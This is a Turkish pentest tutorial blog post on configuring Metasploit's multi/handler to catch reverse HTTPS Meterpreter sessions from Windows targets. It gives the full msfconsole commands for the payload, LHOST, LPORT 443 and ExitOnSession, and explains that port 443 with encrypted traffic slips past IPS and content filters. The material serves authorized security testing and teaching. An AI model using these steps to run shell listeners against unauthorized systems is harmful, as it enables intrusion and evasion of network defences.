MSF multi-handler İstismar Modülü ve Gelen Ters HTTPS Meterpreter Bağlantı Taleplerinin Yakalanması

2
4382
views
Sızma testlerindeki önemli adımlardan birisi hedef sistem üzerinde yetkili erişim sağlayacak bir Payload elde edebilmektir. Hazırlanan uygulamalar beklendiği gibi çalışırsa, saldırgana ait makineye bir bağlantı talebi gelir. Bu yazıda saldırgan makinesine gelen talepleri yakalamak için kullanılan MSF multi-handler istismar modülü incelenecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Bu yazıda “windows/meterpreter/reverse_https” şeklinde oluşturulan bir Payload tarafından gelen talep “exploit/multi/handler” istismar modülü tarafından yakalanacaktır. Ters HTTPS Meterpreter bağlantısının seçilmesinin sebepleri aşağıdaki gibi sıralanabilir:

  • Son kullanıcılar tarafından en çok kullanılan işletim sistemi Windows işletim sistemidir. Bu sebeple Windows için payload türü seçilir.
  • Sızma testlerinde, en çok kullanılan payload türü – Metasploit Framework tarafından sağlanan bir çok yeteneğe sahip olan – Meterpreter kabuğudur. Bu sebeple Meterpreter bağlantısı tercih edilmiştir.
  • Kurumlar ağlarını çeşitli alt ağlara bölerler. DMZ adı verilen ağlarda web sunucusu veya mail sunucusu gibi internet ortamına açılan sistemler bulunur. Bu sistemlere doğru belli portlar açıktır. Bunun yanında, istemcilerin (personelin kullandığı bilgisayarların) bulunduğu ağlara internet ortamından direk erişim sağlanamaz. Ancak, istemci ve sunuculardan dışarıya genellikle 80. ve 443. portlar açılır. Böylece, HTTP ve HTPPS üzerinden hizmet veren sistemlere kurum içindeki personel erişim sağlamış olur. Eğer Ters HTTPS bağlantısı gerçekleştiren bir payload kullanırsa, hem TCP 443. porttan internet ortamındaki saldırgan bilgisayarına erişim sağlanmış olur, hem de şifreli trafik olduğu için (SSL inspection yapılmıyorsa) aradaki koruyucu cihazlar (IPS, İçerik Filtreleyici gibi) tarafından kolay bir şekilde tespit edilmemiş olur. Bu sebeple, sızma testleri (özellikle sosyal mühendislik sızma testleri) sırasında TCP 443. porttan ters HTTPS bağlantısı kuran payload modülleri tercih edilir.

Modülün seçimi ve kullanımı aşağıdaki gibidir:

search name:handler type:exploit
use exploit/multi/handler
show options

handling-connections-with-msf-multi-handler-exploit-module-01

 

Not: MSF’in yeni sürümlerinde modül seçimi ile “msf exploit(handler) > ” yerine “msf exploit(multi/handler) > ” ifadesi görünebilir. Ayrıca modülün “use multi/handler” olarak da çağırılabileceği de görülmektedir.

use exploit/multi/handler
show info
back
use multi/handler

Modülün ayarlanması aşağıdaki gibidir:

set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.244.148
set LPORT 443
set VERBOSE false
set ExitOnSession false
show options

handling-connections-with-msf-multi-handler-exploit-module-02

Kullanılan “ExitOnSession” seçeneğinin “false” olarak ayarlanması ile birden fazla talebin yakalanabilmesi sağlanarak, Meterpreter kabuğuna otomatik olarak düşülmesinin önüne geçilir. Kullanılabilecek diğer önemli seçenekler SessionCommunicationTimeout, SessionExpirationTimeout, AutoRunScript olarak sıralanabilir.

Modül başlatılır:

exploit -j -z

handling-connections-with-msf-multi-handler-exploit-module-03

Payload çalıştığında, bağlantı MSF multi-handler tarafından yakalanmış olur.

handling-connections-with-msf-multi-handler-exploit-module-04

Payload özelliğine göre oturum elde edilmiştir.

sessions

handling-connections-with-msf-multi-handler-exploit-module-05

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

2 YORUMLAR

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.